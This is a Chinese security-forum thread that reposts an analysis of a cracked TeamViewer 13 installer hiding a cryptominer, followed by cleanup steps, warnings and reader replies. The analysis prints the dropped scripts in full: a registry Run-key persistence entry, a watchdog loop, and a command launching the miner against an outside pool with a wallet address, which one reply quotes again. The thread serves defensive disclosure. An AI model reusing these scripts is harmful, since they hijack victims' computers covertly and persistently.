吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 74945|回复: 247
收起左侧

[转载] 你下载的TeamViewer13破解版可能有毒

     关闭 [复制链接]
丶小蓝丶 发表于 2018-8-13 16:05
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 丶小蓝丶 于 2018-8-13 16:10 编辑

0×0 故事背景最近有个远程管理一下某内网服(tiao)务(ban)器(ji)的需求,映射到公网又不安全毕竟黑帽子这么多,思来想去之后还是觉得老老实实装个Teamviewer最靠谱,度娘一下发现还真的不少破解版资源可以下载,于是随意下载一个破解版准备开始操作。
0×1 安装过程 先看一下文件描述信息也没有发现什么问题,就开始下一步安装了。
   1533353369_5b651d99ed14d.jpg
安装完成了功能正常,一切OK,渐渐的电脑开始卡到爆,敏感的有一种不好的预感。
1533353377_5b651da130c4a.jpg
0×2 问题排查开始仔细的检查一下进程列表在最后发现了一个奇怪的进程,居然被植入了挖矿病毒这个也太明显了吧,也不搞点进程注入无文件攻击之类的高端技术,系统盘下面也多了不少.bat与.vbs文件
1533353405_5b651dbd3692a.jpg
直接结束了挖矿的进程之后又自动起来了,还是看看这些同伴里面到底写了什么玩意。
   1533353413_5b651dc5b5dc8.jpg
0.Servicecrsssr.vbs: im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "%windir%\winvprse.bat", 0Set WShell = Nothing
1.Winprs.bat:
@Echo OffREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run /v "Chrome" /f /t REG_SZ /d "%windir%\servicecrsssr.vbs"Exit
2.Winvpr.vbs:
[HTML] 纯文本查看 复制代码
im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "winprs.bat", 0Set WShell = Nothing

3.Winvprse.bat:
[HTML] 纯文本查看 复制代码
@echo offSETLOCAL EnableExtensions:starttimeout /t 160 /nobreak > NULecho offtasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="0" goto starttasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="1" goto processnotrunning:processnotrunningstart "" "%windir%\xdgaudio.vbs"goto startexit

4.xdgaudio.vbs
[HTML] 纯文本查看 复制代码
Dim WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://krb.crypto-coins.club:5555 -u KjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ -p x", 0Set WShell = Nothing



5.Wmipvrse.exe 矿池与钱包都这么出来了,看看到底挖了多少钱。
1533353436_5b651ddc03445.jpg
1533353447_5b651de74ec9c.jpg
0×3 逆向分析  对Wmipvrse.exe这个进程里面的东西还是感到好奇,决定还是看一看,已经加壳了不过还好是UPX的标准壳可直接脱。
CPU-miner github上面的开源代码

1533353455_5b651def742bd.jpg
1533353460_5b651df423e7d.jpg
1533353463_5b651df7c4436.jpg
0×4 病毒清理 事到如此根据几个vbs与bat文件的内容,运行原理还是比较清楚了,就动手清理了。
Step1:使用PCHunter删除6个病毒母体
servicecrsssr.vbs
Winprs.bat
Winvpr.vbs
Winvprse.bat
Wmipvrse.exe
xdgaudio.vbsStep
2:清除注册表
1533353686_5b651ed6aa7bb.jpg
0×5 总结
1.下载软件尽量选择官方平台或者可信的第三方软件平台。2.天下没有白吃的午餐,破解版软件里面可能含有一些让你惊喜的病毒木马后门,也许是一个大礼包呢。3.安全无小事,日常需注意。

本文作者:si1ence,转载自FreeBuf.COM

免费评分

参与人数 81吾爱币 +74 热心值 +74 收起 理由
bjrunbo + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
Fa1c0n + 1 + 1 谢谢@Thanks!
一休的哥哥 + 1 + 1 感谢您的宝贵建议,我们会努力争取做得更好!
a3887387 + 1 这个个人使用不是免费的么?为啥还要破解
gongwx + 1 + 1 谢谢@Thanks!
xiejiayao73 + 1 + 1 用心讨论,共获提升!
龙城狂霸拽 + 1 + 1 我很赞同!
diditang + 1 + 1 我很赞同!
yuanmo + 1 + 1 谢谢@Thanks!
lonelylsy + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
aceryao + 1 + 1 我很赞同!
驴得水 + 1 用心讨论,共获提升!
Alien_MWB + 1 + 1 我很赞同!
bearts13 + 1 + 1 谢谢@Thanks!
qindiows + 1 + 1 我很赞同!
bond66 + 1 + 1 热心回复!
冲峰火车头 + 1 + 1 已经处理,感谢您对吾爱破解论坛的支持!
siuhoapdou + 1 + 1 谢谢@Thanks!
hanxiao666 + 1 + 1 用心讨论,共获提升!
awzs7758520 + 1 + 1 热心回复!
棋子、 + 1 + 1 我很赞同!
nhyehx + 1 谢谢@Thanks!
ytmpgght + 1 + 1 谢谢@Thanks!
TM1819 + 1 向日葵才是真爱!
雪山一支蒿 + 1 + 1 用心讨论,共获提升!
sayhi1984 + 1 + 1 我很赞同!
凤栖梧 + 1 + 1 吓得我赶紧删了软件,谢谢
li6893 + 1 用心讨论,共获提升!
酱爆你个西瓜头 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
han624810 + 1 谢谢@Thanks!
Wanfelix + 1 + 1 谢谢@Thanks!
刘甲乙 + 1 + 1 谢谢@Thanks!
fr33m4n + 1 + 1 用心讨论,共获提升!
lxq951 + 1 + 1 我很赞同!
YCAPTAIN + 1 + 1 谢谢@Thanks!
f123568 + 1 + 1 我很赞同!
netforce + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
chang1582 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
vr4u + 1 + 1 使用tv必不可少,夹杂挖矿程序确实太流氓了
hnrzxx + 1 + 1 谢谢@Thanks!
青山依旧在 + 1 + 1 我很赞同!
浅呼吸lin + 1 + 1 学习了,感谢
ichiban123 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
ly0320 + 1 + 1 完了完了 不会我的也是带病毒的吧
lin295693097 + 1 + 1 谢谢@Thanks!
yangkaixin + 1 + 1 热心回复!
llm4041 + 1 + 1 谢谢@Thanks!
玩机小白丶王 + 1 我很赞同!
dazhang357 + 1 + 1 感谢您的宝贵建议!
Likey + 1 + 1 不一定是植入,你用TV是否注册并登陆了?
wfz_cn + 1 用心讨论,共获提升!
仰头深呼吸 + 1 + 1 我很赞同!
mm2904889 + 1 + 1 用心讨论,共获提升!你收拾之后的文件呢?共享下呗。
小小小英雄啦 + 1 + 1 谢谢@Thanks!
meenee8 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
灬时光向来熬人 + 1 用心讨论,共获提升!
斷亂 + 1 我很赞同!
www.52pojie.cn + 2 + 1 谢谢@Thanks!
poisonbcat + 1 + 1 我很赞同!
zcwapj + 1 + 1 我很赞同!
xinkui + 1 + 1 谢谢@Thanks!
啊那冬菇的喵 + 2 讲个笑话思杰马克dog正版
dafeng2100 + 1 + 1 学习下
雨叶泠 + 1 + 1 好可怕,以前下载过这个软件的破解版,,吓人
执念123 + 1 谢谢@Thanks!
新蜂自媒人 + 1 吓的我赶紧去看看自己系统
fengmosir + 1 + 1 我很赞同!
FLMor + 1 + 1 楼主厉害!
huoji09 + 1 用心讨论,共获提升!
马克 + 2 + 1 谢谢@Thanks!
王七岁 + 1 + 1 我很赞同!
wd1203041 + 1 + 1 我很赞同!
ted322 + 2 路过学习下
LivedForward + 1 + 1 谢谢@Thanks!
lfd118 + 1 + 1 用心讨论,共获提升!
qq164890938 + 1 选软件到52
晓强工作 + 1 + 1 用心讨论,共获提升!
a476376832 + 1 + 1 我很赞同!
4399xiaopenyou + 1 用心讨论,共获提升!
落魂血剑 + 1 + 1 感谢您的宝贵建议,我会努力争取做得更好!
aspicownre + 1 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| 丶小蓝丶 发表于 2018-8-13 17:31
大家也可以看看这个帖子  大牛写的很详细了:一个挖矿病毒浅析
https://www.52pojie.cn/thread-753785-1-1.html
(出处: 吾爱破解论坛)
scott42 发表于 2018-8-26 21:57
xprambler 发表于 2018-8-24 15:28
TeamViewer  可以直接下载官方版本啊,完全可以满足个人的需求,远程什么的完全免费。      抛开病毒不讨论 ...

用破解版的应该大多是规模不大的公司(可能大公司也有用,应该还是看IT运维重要程度),不想花钱买正版,,,底下员工就上网下破解版
返人类 发表于 2018-8-13 17:20
valueble123 发表于 2018-8-13 16:54
感觉很厉害但是看不明白,不知道楼主是怎么看出的挖矿的病毒的呢,有什么特征或者说进程名字特征呢,小白一 ...

CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://krb.crypto-coins.club:5555 -u KjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ -p x"

看不出么……多么明显了……认真看啊
aspicownre 发表于 2018-8-13 16:11
顶顶顶,坏人还是很多的,注意注意
keysersoze88 发表于 2018-8-13 16:14
我是论坛里下的,应该没问题吧
lijin320925 发表于 2018-8-13 16:15 来自手机
论坛里的有毒吗?
hnldzhy 发表于 2018-8-13 16:16
吓死人了,顶一个
akinet 发表于 2018-8-13 16:18
毒啊,无毒不欢啊
zhaoyafei19 发表于 2018-8-13 16:20
老大NB
分析的清清楚楚
梦入神机 发表于 2018-8-13 16:22
刚看过这篇文章,又见到了
feiyunnh 发表于 2018-8-13 16:25
自已用的,用官方个人版都没所谓啦。
m0216 发表于 2018-8-13 16:27

感谢分享!~
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 09:19

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表